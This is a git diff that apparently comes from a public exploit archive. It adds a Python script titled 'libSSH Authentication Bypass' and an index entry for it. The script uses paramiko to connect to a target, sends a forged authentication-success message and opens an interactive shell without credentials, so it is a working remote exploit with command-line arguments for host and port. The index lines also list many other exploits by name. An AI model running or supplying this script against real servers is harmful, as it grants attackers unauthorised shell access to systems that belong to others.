diff --git a/exploits/linux/remote/45638.py b/exploits/linux/remote/45638.py new file mode 100755 index 000000000..c2c43d17e --- /dev/null +++ b/exploits/linux/remote/45638.py @@ -0,0 +1,52 @@ +#!/usr/bin/env python3 +import paramiko +import socket +import argparse +from sys import argv, exit + + +parser = argparse.ArgumentParser(description="libSSH Authentication Bypass") +parser.add_argument('--host', help='Host') +parser.add_argument('-p', '--port', help='libSSH port', default=22) +parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log") + +args = parser.parse_args() + + +def BypasslibSSHwithoutcredentials(hostname, port): + + sock = socket.socket() + try: + sock.connect((str(hostname), int(port))) + + message = paramiko.message.Message() + transport = paramiko.transport.Transport(sock) + transport.start_client() + + message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) + transport._send_message(message) + + spawncmd = transport.open_session() + spawncmd.invoke_shell() + return 0 + + except paramiko.SSHException as e: + print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable") + return 1 + except socket.error: + print("Unable to connect.") + return 1 + + +def main(): + paramiko.util.log_to_file(args.logfile) + try: + hostname = args.host + port = args.port + except: + parser.print_help() + exit(1) + BypasslibSSHwithoutcredentials(hostname, port) + +if __name__ == '__main__': + exit(main()) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2950df989..697137621 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -16876,6 +16876,7 @@ id,file,description,date,author,type,platform,port 45574,exploits/windows/remote/45574.rb,"Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)",2018-10-09,Metasploit,remote,windows,502 45611,exploits/windows/remote/45611.c,"NoMachine < 5.3.27 - Remote Code Execution",2018-10-15,hyp3rlinx,remote,windows, 45629,exploits/hardware/remote/45629.txt,"FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials",2018-10-17,LiquidWorm,remote,hardware, +45638,exploits/linux/remote/45638.py,"libSSH - Authentication Bypass",2018-10-18,"Dayanç Soyadlı",remote,linux, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40151,5 +40152,5 @@ id,file,description,date,author,type,platform,port 45632,exploits/hardware/webapps/45632.txt,"TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure",2018-10-17,LiquidWorm,webapps,hardware, 45633,exploits/php/webapps/45633.txt,"Time and Expense Management System 3.0 - 'table' SQL Injection",2018-10-17,"Ihsan Sencan",webapps,php, 45635,exploits/php/webapps/45635.txt,"Learning with Texts 1.6.2 - 'start' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php, -45636,exploits/php/webapps/45636.txt,"PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add admin)",2018-10-18,"Alireza Norkazemi",webapps,php,80 +45636,exploits/php/webapps/45636.txt,"PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add Admin)",2018-10-18,"Alireza Norkazemi",webapps,php,80 45637,exploits/php/webapps/45637.txt,"OwnTicket 1.0 - 'TicketID' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,